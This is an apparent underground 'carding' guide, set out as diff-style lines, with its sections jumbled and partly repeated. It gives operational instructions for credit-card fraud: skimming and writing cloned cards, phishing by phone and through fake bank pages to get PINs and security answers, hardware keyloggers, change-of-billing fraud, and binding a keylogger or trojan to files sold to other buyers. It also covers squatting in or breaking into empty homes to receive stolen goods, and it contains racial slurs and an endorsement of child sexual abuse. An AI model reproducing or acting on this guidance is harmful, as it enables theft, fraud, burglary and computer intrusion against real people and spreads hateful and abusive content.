+How it's done is through the use of thejerm software or any other magstripe utility software (thejerm is
+the best to use). And you do it like this:
+Written by: Acetrace
+1. Load up thejerms software
+2. hit settings tab
+3. hit "Defaults" in Leading Zeros box
+4. hit "75 bpi" in Set Track 2 density box
+5. go bak to actions
+6. hit LoCo or HiCo in Coercivity box, depending on which you want to do
+7. input your tracks 1 & 2 (without the % ; or ? symbols because the program already does it for you)
+8. hit Write Card and swipe your card. (i usually do a read card afterwards to make sure everything went
+ok)
+9. GO SHOPPING!!!
+Download thejerm from here:
+Code:
+PM ME FOR DOWNLOAD LINKS (OMNISCIENT)
+I was a member of this site and it came from there so don't worry about it not being safe, I used this
+software a lot back in the day.
+Now how you should act when you go carding instore is pretty much common sense, but some people get
+caught up in the moment with nerves, cockiness or just too much weird amounts of excitement.
+
+Simple what you do, make sure you KNOW the PIN for the card you're using before you go, don't be
+stuck at the counter trying to remember it. If you're going to be carding expensive goods then dress smart
+for the occasion, wear brand named clothing (that you've previously carded ) or even a suit. It would
+look suspicious someone with a hoodie going into a store and buying a Louis Vuitton watch, so walk in
+with style. When you go instore, you ACT like you are using your own card, because essentially that's
+what it is (well it is now anyway lol) no looking shifty and don't look at the fucking cameras; the cameras
+mean nothing anyway, they don't know your name or where you live, they're not being watched half of
+the time, so stop worrying about the fucking cameras; remember you're doing nothing wrong. When you
+go in, don't rush take your time, browse around some other items. Find the item you want to card and
+even ask the employee simple questions about it (if it's a TV or comp just ask questions about certain
+specs and if it's good for playing video games on). You'll be most nervous at the checkout, just act as
+normal as you always have been, don't make too much small talk but be polite and civil. Once you have
+the good sin your hands don't bolt out the door, just say thank you and then casually walk out the door,
+get to your car and then celebrate all you want.
+Carding over the phone
+Okay 1st of all do not be a dumb fuck now, do not call from your own phones at all. For extra lulz you
+could use a beige box and call from someone else's phone but that's a totally different game all together
+and is also a major felony to go agains tyou on the chance that you do get caught so we'll keep it simple
+and use a payphone (it's not AS risky to phreak these but the only recent red box tones I have are from the
+year 2007 and I'm pretty sure they'd have changed the system again...bastards, I'll check sometime though
+. The next day postage is said so that they have less time to look up details on the order. Some cards will
+have difficulty shipping to any address other than the billing address, but it doesn't hurt to try. If they start
+to question you then just answer the questions and talk your way around the situation with your social
+engineering skills; don't just run away from the questions or hang up straight away, otherwise that is
+cause for suspicion and they may investigate. If all goes well you should have your item of choice
+delivered to your drop location or a house of someone else's address who you don't know and call them
+up saying that you called up the store and they've sent the package to the wrong address and it is still
+sending there, and ask them if they could kindly keep and sign for the package and you'll pick it up after
+work (this is a last resort and only to be tried if you're good at talking to people, which you should be if
+you're a carder). I recommend checking out the section on drops later on in this text.
+I recommend using spoofcard for verification over the payphone, if they need to verify (if they won't send
+without some verification which is usually the case).
+IRC
+Services provided in IRC
+IRC is the main gathering for fellow carders, scam artists and rippers. To put it in a nut shell, IRC is THE
+black market, unlike craigslist and eBay which are just black markets. You can get anything illegal off
+IRC from CP to warez to CC details (which is what we want).
+To concentrate on carding though you can buy:
+CVVs
+CVV2s
+SSNs
+Utility bill scans
+CC scans
+COB (a service to get someone to call up the victim's bank and get the billing address changed to your
+drop)
+Payment for using someone else's drop and then sending to you
+Spyware
+Fake ID/ ID scans
+DUMPZ
+Phisher pages
+The list really is endless
+
+There are a lot of advantages to using IRC networks and channels which I'll go into now:
+- The channels are often underground and not known to many people, so they're harder to stumble upon
+by some random guy.
+- The messages can be encrypted so they can't be read by anyone happening to be on the network sniffing
+the traffic. This makes it harder for investigators to uncover.
+- Easier and quicker to communicate with mass amounts of like minded people.
+- Variety of channels to go to if one doesn't suit you (there are MILLIONS and new ones being made
+every second, guaranteed).
+- And of course a varity of services, if you need something you can bet someone from the other side of
+the world will be willing to share or/and sell to you.
+There are a lot of disadvantages though, IRC is the equivalent of a backstreet alley, you'll be fine if you
+stay cautious, here's what you should be weary of:
+- Viruses
+- If you don't have strong anti viruses and firewalls you will get infected (no norton shit, kaspersky and
+NOD32 are what you want)
+- Do not accept random .exes or any file for that matter
+- It is easy to get ripped off, choose your forms of payments and who you deal with wisely
+How to find carding channels (Will not go too much into this as there are secrets between fellow carders
+which we like people interested enough to find out for themselves)
+Here is the most commonly asked question I get asked by n00bies and fellow carders; where do you find
+these channels?
+If I'm being totally honest the best place to find out about them is through Nigerians; no bullshit that is
+where I found out about a lot of the carder channels I used, also how I found out about forums and their
+IRCs too such as cardersplanet, darkmarket etc. How I found him out was just on a normal scam bait I
+was doing, it wasn't a long one, but in the end he tried phishing me so I tried back and we had a laugh
+about it; I was straight up with him and told him I wanted to get deeper into the game, I looked up to his
+type of people and wanted to get rich/successful (I also shared the double claim secret about paypal with
+him which got him trusting me a little bit) he then sent me an invite to cardersplanet (this site was full of
+Nigerians). Eventually I went in the IRC (admittedly got ripped a few times) then started vending myself
+under various diff nicknames, then moved onto different sites like darkmarket and cardingzone when I'd
+got invites for them (although cardingzone is shit it's good to get in the IRC for starting off, you'll get
+invited to better forums the more you hang out in IRC, trust me). Don't ask me for invites to cardingzone,
+I was banned for ripping (I didn't rip anyone :angry
+The quicker way is to use these and search for certain keywords:
+Code:
+http://www.irclinux.org
+http://www.irctrace.com
+http://www.irclog.org
+http://www.rcarchive.info
+http://www.irc-chat-logs.com
+http://www.irseek.com/
+And of course don't forget google.
+I'm only going to give you one clue for searching through google for a carding IRC, and that word is
+"undernet".
+Fellow carders don't like revealing their IRCs, and for obvious reasons.
+
+My advice is find a scammer through e-mail, and chat to him; be witty with it but be respectful to a fellow
+fraudster.
+Vendors and how to approach them
+Vendors are the people in IRC who are selling and providing the services for you. There are certain ways
+you should speak to vendors otherwise they're going to rip you (remember this is the black market, this is
+just like going up to a random drug dealer in the street and not knowing what you really want or what
+you're getting into; you'll get ripped off). Ask as many questions as possible of what you want to know, if
+you're buying a CVV2 ask to see proof of their details working (get them to make a small purchase
+somewhere; they should show you a before and after and the limits that are there on the card [there are
+methods out there of checking your balance; you can even get it through text/sms]. This is a market so
+remember there are more people that will be willing to buy from that vendor, it's open for all, you can get
+a full load of info including dumps for as low as ?3/$5, drops usually go for ?7; if someone is saying
+higher prices don't be afraid to haggle down to these prices or a little bit lower. COBs go for a little bit
+higher in ranges of ?15-?20 because the vendor needs to get full info on someone and then change the
+billing address through the bank to where ever your drop is.
+Now when you go in the channel don't fucking say or request anything, shut up and see what the vendors
+are saying they have to offer and then send them a private message and talk to them. If any "vendor"
+messages you 1st trying to push onto you to buy from them then they're most likely a ripper; however
+don't piss off the rippers or assume someone is a ripper because you never know who is going to be there
+to help you out later on down the line or who might be pissed off enough to fuck you over.
+I can't give any big advice on not getting ripped in IRC because you don't personally know anyone in
+there at all, you just have to take your chances (expect to get ripped your 1st few times going in there, just
+don't go to them again, because if they get away with it once they'll definitely try again if you go back to
+them).
+DO NOT BUY ANY WU BUG(Western Union Bug); it is a massive ripper technique which is bullshit.
+The WU BUG used to work but was patched a looong time ago, most of the time now you'll get nothing
+or you'll end up with a rootkit on your comp. Rippers always say ridiculous prices for these too such as
+$200+; but if someone says lower prices it's still bullshit and most likely a rootkit/trojan/keylogger going
+to be installed on your machine while you get some useless program that does nothing.
+Ripping
+Easy as hell to do, not much photoshop skills needed really either.
+Bullshit and say you're selling full info (you're getting the info from fakenamegenerator.com or any credit
+card gen program; of course they don't fucking work), if they want to see proof just use your own legit
+CC or another stolen CC to buy something and show them proof of you buying it, except photoshop the
+details to that which you're going to be giving him later. Take payment through Western Union ONLY
+(since e-gold isn't around anymore), then just send him the bullshit info.
+If they want the report to go to their phone via SMS then just spoof a text with an sms bomber saying
+some bullshit reports. Then get the payment via WU.
+To get victims you message them 1st, message out in the whole channel 1st and then PM random buyers
+(look for ones requesting).
+::::WU BUG::::
+seriously this is bullshit, all people are doing are showing buyers fake screenshots made in PS or are
+actually making quick programs themselves and taking screens of them and then selling them, although
+essentially they're useless. You want to do this, but you want to actually send them a file as well, but bind
+a keylogger or trojan to it; not only can you rip them out of their cash to buy your infection but the info
+you get from spying on them will be so much more as well ranging from their info to other stolen CC
+info, you'll have a backdoor on what they do and can exploit it.
+
+If you can't be bothered making fake screenshots then get them from other rippers trying to sell them, get
+them to show you pics, vids and info; then use it for yourself and rip some n00bs.
+Phishing for Change of billing
+A billing address is the details used for a person's bank account and most often their credit cards and
+everything else too, this includes their phone number too.
+What a change of billing (COB) is in a nutshell is changing the billing address registered to the card to
+your drop address you're gonna be using. When you want to card BIG at various online websites the
+orders will look more legit that you're not sending it else where other than the one registered to the card
+(obviously after you've changed the billing address), meaning the delivery of your goods will be quicker
+and will require a lot less verification.
+Most of the time you change the billing address over the phone but SOME banks will let you do it online;
+when you phone up to change it you use spoofcard.com or the pay as you go mobile phone you're going
+to be using when carding, or beige boxing
+When changing the billing address you need to know as much info as possible about the person's billing
+address you're changing, because the bank is going to ask you 3 security questions you set (such as
+mother's maiden name) before they change it.
+You can phish for details over the phone (see the phishin over the phone section above), however it's best
+to use keyloggers and phisher pages for this with a MIX of over the phone.
+Use through phishing pages
+2 methods here, 1 including over the phone, one isn't.
+The method without the phone is to just send a ton of e-mails out to random people and send them a html
+e-mail telling them they need to update their information before the account is suspended or their account
+with the bank will be cancelled, you have them go to a phisher page off the template and the phisher
+pages "requires" them to answer security questions like their mother's maiden name, their pet's name, you
+know those type of questions.
+Another method is to call them up pretending to be the bank and saying there have been different ip
+ranges logging on their account and they need to confirm their details online, link them to the phisher
+page and have them fill in the details; have the phisher page redirect to the actual online bank's login
+page; then ask if they've done that over the phone, tell them to wait a minute while you confirm and check
+it all out, say it's all clear and tell them to log in, they'll think nothing of it and you now have the answers
+to their secret questions which you can give to the bank itself when you go to change the billing address.
+Use through keylogging
+This is my favourite method and what I told S_E last night in IRC.
+You have a hardware (or software) keylogger set on someone's comp, use sock proxies when logging into
+their online bank account and then change their password, call them up pretending to be the bank and then
+get them to go to the actual online bank link and fill in their forgotten password options (answering secret
+questions) or of course get them to go to your phisher page and fill in the details (this is if you want to
+add more fields to get more info) then pretend to be checking it all over, then change their password again
+to some random letters and numbers and give it to them to log back in (it doesn't matter because they're
+keylogged and you'll get their new login if they change the password again anyway), you'll have all their
+info logged down too for you to answer your questions when you call the bank.
+Best time to do all of this is around the 10th day of the month (people usually get their credit reports at
+the start of every month), this will give you plenty of time to card enough for the remaining days until
+they see they're not getting their reports coming to them anymore (if you're crafty you can pretend to have
+
+cancelled the online bank account for them after they've gave you the info you need to know; I used to do
+this method and keep it going without them knowing).
+You need as much info as possible when calling up the bank to change the billing address.
+Drops and what you need to know about them
+Drops and what you need to know about them
+What drop locations are and what they?re used for
+Well simply a drop location is an abandoned house, or any house that is not under your name or any of
+your details. You can lead young children into these to make a sexy time with them, get items delivered to
+them that you want no one else to find about or risking finding, or just use it to squat in if you have no
+where else to go. Basically they are used in ways of keeping your nose clean and are used by mostly scam
+artists and sex offenders.
+How to find a drop location
+There are many ways of finding a drop location for use, whether it temporarily or permanently (although I
+suggest swapping and changing locations because my main last one I used got raided or broken into and
+is boarded up and too hot to use); I will suggest 3 ways on how you can find some for you to use.
+One final tip is don?t bother going for houses that are boarded up at the front where it is visible to passers
+by (it?s okay if round the back is boarded up)
+Way #1
+As just mentioned you can go about it many different ways but one of the ways the way I prefer to go
+about it is you should be looking around some older housing estates and more ghetto areas (could also tie
+in with the sob story you feed to a paedophile/child predator you are possibly scamming). For example in
+Derby there is an area called Sinfin, but now there is 2 parts to it and they are New Sinfin and Old Sinfin.
+Old Sinfin is the are you would want to go to, because it?s older it?s most likely to be alot more houses
+abandoned or deemed unsafe (it?s bullshit).
+Or if you were lucky like I once were then you could ask around your mates if there are any empty houses
+in their area. If there are then you?re in luck and can even have your friend keep tabs and watching over it
+for you and give you details so you can keep it all under wraps and safe. It may be alot riskier with
+neighbour hood watch morons, and nosey neighbours, but it?s still ideal and a little bit less suspicious
+than the abandoned houses in the older estates, and this is because the older estates usually have all
+abandoned houses close by, where as the odd one out covered with a street filled with inhabitants will
+seem less suspicious to the postman.
+Way #2
+Now this is a temporary way of finding a drop location, but is sometimes an effective ways and means of
+getting what you need but has a bit more risk to it; and personally is a way I have never used even till
+today.
+Have you ever been eavesdropping on a conversation between a neighbour and one of their family
+member?s or friends?, or been down the pub and heard the common as muck chavs boasting about a
+holiday they are going away on for however long they say they?re going away for?
+Well listen out for these type of conversations. Because them away on holiday means the house is most
+likely going to be empty for however long they?re going away for. So if you already know where they
+live then that?s great the job is made easier; if you know their first name and surname then look them up
+in the phone directory and find their address to go along with the number. If you don?t know where they
+live, or their name then just listen out to see if you can hear their names come up in conversation; just
+remember that if it?s in the pub it?s most likely local to it that they live, so you could easily find out by
+following them home and seeing.
+Way #3
+
+Possibly the safest, easiest way of finding, and quickest way to get a drop location.
+Most areas have houses up for sale am I right?
+Or houses that are up for bidding on, am I right?
+Well they have a website with a full list of your local area(s) that have houses up for bidding on and for
+sale.
+For example I would search Derbyhomefinders and look at the list on their site.
+All of these houses are empty and often do not have a sign up outside them either (if they do then just
+take it down and hide it somewhere for the time being).
+The advantage to using the lists to find the drop locations to use is it will usually say when the bid is up or
+if the house has been sold (this lets you know that it will not be ideal to use that certain house now it?s
+most likely to be inhabited) and will have the houses on there that are still being bidded on and that are
+still up for sale, these are the ones you want to be using.
+The best thing about this though is that you have a full list of many different drops to use (like I said
+earlier it?s best to switch drop locations and use many different ones) and it is updated with new ones
+coming up and tells you full which ones are over and not usable.
+You just need to know your agencies for housing and find their website.
+Obtaining and using drop locations
+You?re probably thinking now I?ve got/found one that?s great and everything but how the fuck do I keep
+it a secret?
+for way 1
+this much is obvious that you do not tell anyone except your partner if you?re doing a team bait, and 1
+trustworthy friend to keep tabs on it if you are doing a bait on your own, and also the paedophile, but only
+when he asks. But there is alot more to it than that, also maintaining your abandoned house and making
+the postman think someone living there.
+Appearance isn?t everything at all in any case and it isn?t for this either, but of course you try to make
+yourself look as best as you can. The same principles are applied to keeping an abandoned house; you
+should atleast try to get a new lock put on the door which you will also have a key for; just so that if any
+druggies go there before you then they will have a tougher time getting in (of course it?s ideal you don?t
+get somewhere known to druggies but this is an example of what use it could have) but also if there is a
+fucked up lock on a door then it?s pretty damn obvious only low life scum or some criminal(s) are using
+the place, so buy a new lock for the door and get it fitted on, whether you do it yourself or get assistance
+from a friend who knows what they are doing.
+Now as for overgrowing plants and weeds, you can only do so much without being suspected. Do not use
+a lawn mower, use clippers and hack it as short as you can. It?s best to get all of this done when everyone
+is at work during the day time; but in reality it isn?t ideal at all and most criminals don?t tend to bother
+with this. Instead they will make it seem someone is in but is just too ill to do anything with the garden or
+is just a lazy fucker. They do this by often writing up a note and sticking it to the door or leaving it on the
+floor near the door saying something such as "No milk today please" or "Not in, please leave packages at
+post office".
+Write a few letters to yourself aswell ready to come on the same day as the parcel, this will make it look
+like you get mail and not just the one off suspicious package now and then.
+Now 2 alternatives, you can either get to the abandoned house and take the mail from the mailman while
+acting like you live there (you must look the part as lazy or disabled if you have ingrown plants in "your"
+
+garden) or you can leave a note saying to take any packages to the post office for pick up because you are
+at work or something along those lines.
+One final rule is do not be in and out of the hideout everyday or whatever, visit probably 2 or 3 times a
+week.
+Way 2
+Now there are 2 ways to go about this; you can either just get to the house early in the morning a little bit
+just before the postman arrives and be at the house outside pretending you?re just about to leave and then
+sign for the package (if you need to) and collect it off the postman and then be on your way after he?s
+gone. Or if you?re good at bypassing alarms (I have a guide on burglary) or the house has no alarm then
+you could bump key in at night time (not recommended) or during the day time the day before when
+everyone else will be at work aswell, and hide out there for a bit (hell even take some food that is left in
+the fridge and feed yourself since you?re spending the rest of the day and early morning there). Basic
+rules are don?t have tv on too loud if at all, or if you do then put head phones on into the tv if it?s that old
+of a model, and leave everything how it was left an say upstairs so incase any neighbours or anyone
+looking after the house while the owners are away come in then you have time to hide.
+Obviously if it?s a package you don?t have to sign for then you can stick up a note on the door early in
+the morning before the post man comes saying to leave it round the back or what ever excuse you wanna
+make up.
+Way #3
+Easy, just as previously except you don?t have to be as cautious and often the alarms are disabled for that
+time being anyway so you don?t have to worry as much if you bump key into it.
+As also stated previously in this guide, if there are any up for bidding/for sale signs then take them down
+and just get them out of the way.
+You can even go to this one the night before instead of day time because no one is hardly going to be
+watching over this unless it?s in a neighbourhood watch area (in which case you chose the wrong area
+anyway, you dumbass).
+Some basic tips to keep in mind
+-- Be there before the postman! can?t stress this enough, it?s too fucking obvious if you?re late.
+-- When signing for packages, if you need to, then sign a fake signature (the sig can be any made up fake
+shit) with your hand that you don?t write with, so it?s harder to trace incase things go tits up later on
+down the line.
+-- Take anything in any guide with a pinch of salt, things may be different circumstances for you and your
+situations.
+Carding I
+This is a creepcentral publication
+Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing
+addresses
+Including drops and what you need to know;Huge guide written by me
+
+Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing
+addresses
+Including drops and what you need to know;Huge guide written by me
+kay major updates done to this carding yext, it will cover the basics of most carding knowledge. Going
+into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2
+different categories of their own.
+kay major updates done to this carding text, it will cover the basics of most carding knowledge. Going
+into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2
+different categories of their own.
+What I'm going to cover:
+Online Carding
+- A quick overview of what online carding is
+- SOCKS and why we use them
+- Finding a cardable site and what cardable means
+- Carding "non cardable websites" with fake CC scans and other fake documents
+Carding while on the job
+- Getting CC, CVV, CVV2 through use of mobiles
+- Skimming whilst on the job
+- Using carbonless receipts to get details (pretty outdated method)
+Trashing
+- Trashing for receipts and credit reports (pretty outdated although still works)
+Phishing over the phone
+- Phishing over the phone for details
+Keylogging for CVV2s
+- Hardware keylogging
+Carding Instore
+- What instore carding is (very brief)
+- How it's done
+- How to act and present yourself instore
+Carding over the phone
+- Carding over the phone
+IRC
+- Services provided in IRC
+- Advantages to using IRC for info
+- Disadvantages
+- How to find carding channels (Will not go too much into this as there are secrets between fellow carders
+which we like people interested enough to find out for themselves)
+- Vendors and how to approach them
+- How to rip in IRC (EVERY vendor, reliable or not has ripped some n00b who acted like they knew
+what they were doing)
+::::WU BUG BULLSHIT and how to rip n00bs and gain more::::
+Phishing for Change of billing
+- What COB is and why it's useful
+- Use through phishing pages
+
+- Use through keylogging
+Drops and what you need to know about them
+- Drops and what you need to know about them
+What carding is
+Carding summed up quickly is the act of obtaining someone's credit card information, from the CC#,
+CVV, CVV2, CVN, and the billing address, along with the expiry date and name of the person the card
+belongs to along with a signature.
+Online Carding
+Online carding is the purchasing of goods done over the internet with the CVV2.
+Now for you n00bies you're probably wondering what a CVV2 is, it's simply just the database of basic
+info for the card such as the card type (e.g. Mastercard) First and last name, address and post code, phone
+number of the card owner, the expiry date (and start date if it's a debit card or prepaid CC), the actual CC
+number and the CVC (card verification code, which is the 3 digits on the back of the card).
+This is the format you usually get them in when you buy off IRC:
+:::MC ::: Mr Nigerian Mugu ::: 1234567890123456 ::: 09|11 ::: 01/15 ::: 123 ::: 123 fake street,
+fakeville, ::: Fake City ::: DE24 TRH ::: 01234-567890 :::
+SOCKS and why we use them
+Now with ANY fraud at all you have to take precautions so you don't make it easy for anyone to catch
+you in your wrong doings. As usual I swear against TOR for carding/scammin because most nodes are
+blacklisted by websites and because TOR cycles through various different proxies; and even if you
+configure it to go straight through an exit node of your choice it's still not worth it. You can use JAP but
+make sure you're using some constant sock proxies from the same city, town or area that the card is from;
+also go wardriving and use a VPN (don't trust anyone off IRC with these, you'll have to do some
+searching around yourself for a highly trusted one and one which won't comply with LE).
+You can get good SOCKS from anyproxy.net (people are selling accounts for the site in IRC all the time),
+that's the best place but even I ended up losing the account eventually (unknowingly I was sharing it with
+some Nigerian dude who became selfish).
+So we use SOCKS because they stay constant. But don't let that get your guard down, you want FRESH
+proxies everytime you card.
+Finding a cardable site and what cardable means
+Basically a cardable site holds these characteristics and what you should be looking for to determine an
+easily "cardable" website:
+- The top one you need to look for on the site's TOS is that they send to any address and not just the one
+registered on the card (although you can easily get around this if they don't, with a COB, photoshopped
+verification (will go into detail later) or some social engineering over the phone).
+- The next important to look for is if they have a visa verification code or mastercard secure code (most of
+the time if you ask your vendor they'll include them in your CVV2 details textfile), if they do have one of
+these you have to put in and you don't have them then don't waste your time
+- If they ship internationally (for obvious reasons, but you can just stick to local websites and order to
+your local drop)
+- If they leave packages at the door when no one's in, or around the back in a safe area (I know of one site
+in the UK that has all these qualities including this one, it is perfect for carding clothes)
+- Also you can't forget to see what other security checks they need to do (if they need to call you up to
+verify or want a utility bill, passport or a scan of the actual CC)
+It is hard to find websites online now that have most of these qualities, therefore we have to use COBs
+and photoshop to help us along the way, which is what I'll go into now.
+
+Carding "non cardable websites" with fake CC scans and other fake documents
+Okay so say you come across a site that will deliver to another house not registered on the card, but they
+want verificaton either through phone or scans of a utility bill, credit card or passport.
+For this you'll want to get a pay as you go deal for a cheap shitty mobile all in fake details (say a nokia
+3210, brick LMAO!), or you can use spoofcard.com to your advantage to help you. Hell if the person's
+details you're using is local to you and you're daring then go to their home and beige box from there; it'd
+be very convincing.
+If they speak to you over the phone have all details in your mind about the item you're carding, have some
+bullshit story if you're having it sent to a diff address such as a family member's birthday and you need it
+there as quick as possible as it's a last minute thing, or some shit like that. If you're carding multiple sites
+at the same time it's easy to get them mixed up, so make sure who it is calling you 1st.
+For CC scans and how to do them check the attachments at the end of this file, they explain so much
+better than I could. How you use them is once you've made them like the tuts have said to do, you then tilt
+them a little bit so it does actually look like a scan. To make it even more believable put some paper in the
+scanner (dark shade if you must), scan it and open in photoshop and then put the shopped CC scan of the
+front onto it and then do the same with the back, then send the scans to them via e-mail or post. Same
+goes for utility bills (can be got through trashing or your own, and then edited in PS).
+Do not use the same designs when making your CC scans, otherwise it will become too obvious. To give
+you a head start on mastercards (what I recommend for n00bs to go for) I'm giving you a globe hologram
+image so you won't have to buy them in IRC; unfortunately all of my visa hologram pics are shit, but I'm
+working on getting a good one soon.
+VISA hologram pic coming soon!
+Carding whilst on the job
+Getting CC, CVV, CVV2 through use of mobiles
+Believe it or not giving your information out to anyone anywhere is not a wise choice, you can not trust
+anyone in this day and age. Yes there are carders working on the inside in places where there are a lot of
+people around flashing off their plastic cash and using them freely without a care in the world. The most
+common of places for a carder to work at are brand label clothing stores such as Limey's, Charlie Brown's
+and all the other trendy shops.
+Ever noticed when yourself or someone else has paid at the desk with a debit card or credit card that they
+bring out a keypad from under the desk, then put your card into it and have the buyer input the pin? Think
+again when they take your credit card and go under the desk with it to get the keypad, they are doing
+more than just that; just because they're not taking the card and running off with it does not mean they're
+not stealing your information. A friend of my dad used to card and work in a clothing store, he used to
+have a piece of play doh stuck under the desk and he used to press the card onto the piece of play doh,
+unfortunately he began doing it too much and because he'd gotten away with it so many times he became
+careless and got caught out by a co worker and from what I know he is still doing time. The moral is, be
+careful with the play doh method. The unfortunate thing is you can only get the full info of 2 cards at the
+max, and you don't know exactly if you're pressing over the info of another card already put on to the play
+doh. Also you can't get the CVC through this method, I was just giving a classic example from the olden
+days.
+But there is a new wonderful invention called cameras, video recording, and mobile phones and they are
+even all working on the same thing. It's best to test it out 1st and have a camera on your phone that is at
+least over 2 megapixel and allows long enough video recording times. The phone is set to video record
+and on a lighting if needed, and taped underneath the desk for you to record both sides of the card for all
+the information you need, as well as being quick you can get a lot more than 2 on, depending on how long
+
+each recording lasts, you may need to start more than one recording.
+You need good reason to be going under the desk to get the chip and pin machine, so make the desk look
+cluttered up and put shit in the way of everything, such as coat hangers and various other items; or you
+could just flat out bullshit the customer and say that the chip and pin machine on the desk isn't working so
+you need to get the other one, take their card and then go under searching the desk and quickly show it to
+the camera phone and then get the chip and pin machine and put the card in it and then hand to the
+customer to put in their pin as normal, unaware you have a CVV2 to later use when shopping online.
+Skimming whilst on the job
+For skimming you'll want a mini portable MSR500M reader that can be fitted on your waistline belt or of
+course once again under the desk, if you're a cashier. But you'll also want a MSR206 writer if you plan on
+writing the tracks to an embossed CR-80 piece of plastic later (you can make these yourself but
+embossers are expensive and it's an expensive procedure, so wait a while until you do that yourself and
+buy them from IRC (be careful, people like to rip with plastics, or you'll get shit quality if you don't watch
+out).
+If you plan to just sell the dumps on IRC then that's fine, but you'll still need the PIN as well, so if you're
+a waiter you can get a cheeky peek at them putting their pin into the chip and pin device while you keep
+hold of it slightly (have them put the pin in while they're sat down and you're standing up). It's much
+easier to skim in a restaurant rather than clothing retail, as you don't have to think it out and set it up as
+much. You can keep the MSR500M in your front pocket of the uniform you're wearing and pretend to be
+giving the card a clean on the sleeve (bullshit and say the device won't read it), while really you're giving
+it a swipe into your reader. This way the person doesn't even get suspicious because you don't take their
+card out of sight with them. I guess you could do that technique with clothing retail too when you get
+their card in your dirty little hands, but peeking for the PIN is harder or you'll have to have a friend
+shoulder surf for it (or if they're on the next register have them use a sony cyber shot c902 camera phone
+and pretend to have them talking on the phone while really they're recording the person next to them
+putting in their PIN; cybershots are really inconspicuous looking with their cameras and VERY clear
+[5mpixel]).
+I'll go into detail what to do with the dumps you have later in the instore carding section.
+Using carbonless receipts to get details (pretty outdated method)
+If the store you work at hasn't gone carbonless on the transactions information then you can get most of
+the info from the receipt you get a copy of for yourself and note down the pin on this as well when/if you
+get it.
+Trashing
+Trashing for receipts and credit reports (pretty outdated although still works)
+Ever heard the expression "Another man's trash is another man's gold"? That's exactly what this is. You'd
+be surprised how many people haven't heard of a paper shredder or bonfire. They just dump their
+financial records containing SSN's/NI, full name, address, bank, credit card number, CVV, CVV2 etc. All
+on forms people couldn't be bothered to dispose of properly because they thought they were JUST old
+records. Again carders wok on the inside again for when they want to do trashing, a lot of janitors wear
+rags but you'd be surprised how secretly rich most of them are (along with the other shit they steal from
+work as well). But also from this if there is not enough info for you on the forms then there is definitely
+the phone number of the mark on the form that they've scrapped; almost always, and if not then there is
+enough info on their to look them up in the phone directory. Then of course you use social engineering
+skills over the phone to get the extra info that you need. If you know of a store that is not carbonless, then
+go trashing in the bins at the back of the store for the receipts with the credit card details on it.
+Phishing over the phone
+Phishing over the phone for details
+Ever had telemarketers ask for your credit card info over the phone? (this is if you haven't already hung
+up by just hearing a nigger or paki on the phone) chances are they're a carder. Believe it or not there are
+
+people actually stupid enough to fall for these obvious scams. Even more people fall for this if they
+believe that the caller is from the credit card company itself or part of the secret service or credit fraud
+investigations; the FBI, CIA and police have nothing at all to do with credit card fraud believe it or not. If
+you sound professional or part of an important group such as investigations then people are more likely to
+comply with you if they believe that their card has been used for credit fraud purposes and have to give
+their credit card info and billing address for verification. The best time to call up the mark is when they
+are at work as it'll take them by surprise and they'll be wanting to get it sorted asap so that they can get
+back to work. Also if it's "serious" then the secret service don't wait for you to finish work before they
+question you. Play along well to the part you're pretending to be. Some social engineering skills are
+required and you must gain the experience of lying to people yourself. Before calling up the person find
+out as much information about them as you can.
+If you've stolen a CC from someone personally you can call them up pretending to be their bank and tell
+them there has been some suspicious charges made to the credit card from places such as South Africa,
+Nigeria, Turkey, Russia; places like that, get them to confirm their details (milk as much as you want out
+of them, ask them bullshit security questions such as their mother's maiden name, address, etc; you may
+as well, it'll make it easier to get a COB for you to use).
+You can also get their PIN out of them if you want as well by either straight out asking them to confirm
+it, or be crafty and after you've told them to verify their PIN you're putting them through to a different
+department; then play some cheesy music down the phone for a few mins, have a female voice recording
+(use AV vocie changer) asking them to input their PIN on their dialpad (this won't be as suspicious); get
+these recorded so they can be decoded with DTMF decoding hardware/software later (although it's
+expensive). Guessing DTMF tones is pretty easy too, but you need to know what each tone sounds like,
+it's preferred to use decoding software to ensure you have it correct.
+If you try hard enough you can get full info about anyone over the phone (I suggest using spoofcard for
+this).
+Keylogging for CVV2s
+Hardware keylogging
+First of all it's best if you use hardware keyloggers here that you put into the keyboard of a computer
+belonging to an area where a lot of people are going online a lot and logging into e-mails, ebays, paypals
+etc, pretty much giving you enough info for you to go searching through if you get in their e-mails, or
+maybe you're lucky enough to get someone who is buying something online anyway. Get the keyloggers
+from here:
+Code:
+http://tyner.com/datalogger/keykatcher.htm
+And come back within 2 days time or so and collect the keylogger after doing some browsing yourself (as
+to not look suspicious just coming in and then leaving a few seconds later).
+Or of course you could set one up in a business and do the classic call in and do some social engineering
+from the credit card company or secret service and have them go to the bank online and have them log in
+to verify, or maybe even have them log in to a fake bank online made by yourself that will collect
+anyone's info who logs in on it.
+Carding Instore
+Instore carding is the act of skimming a credit card and writing the dumps and track1+2 to a CR-80 piece
+of plastic and then either cashing out at the ATM or shopping for goods instore, as long as you have the
+PIN as well through whatever method you choose to use.
+How it's done is through the use of thejerm software or any other magstripe utility software (thejerm is
+the best to use). And you do it like this:
+Written by: Acetrace
+1. Load up thejerms software
+
+2. hit settings tab
+3. hit "Defaults" in Leading Zeros box
+4. hit "75 bpi" in Set Track 2 density box
+5. go bak to actions
+6. hit LoCo or HiCo in Coercivity box, depending on which you want to do
+7. input your tracks 1 & 2 (without the % ; or ? symbols because the program already does it for you)
+8. hit Write Card and swipe your card. (i usually do a read card afterwards to make sure everything went
+ok)
+9. GO SHOPPING!!!
+Download thejerm from here:
+Code:
+PM ME FOR DOWNLOAD LINKS (OMNISCIENT)
+I was a member of this site and it came from there so don't worry about it not being safe, I used this
+software a lot back in the day.
+Now how you should act when you go carding instore is pretty much common sense, but some people get
+caught up in the moment with nerves, cockiness or just too much weird amounts of excitement.
+Simple what you do, make sure you KNOW the PIN for the card you're using before you go, don't be
+stuck at the counter trying to remember it. If you're going to be carding expensive goods then dress smart
+for the occasion, wear brand named clothing (that you've previously carded ) or even a suit. It would
+look suspicious someone with a hoodie going into a store and buying a Louis Vuitton watch, so walk in
+with style. When you go instore, you ACT like you are using your own card, because essentially that's
+what it is (well it is now anyway lol) no looking shifty and don't look at the fucking cameras; the cameras
+mean nothing anyway, they don't know your name or where you live, they're not being watched half of
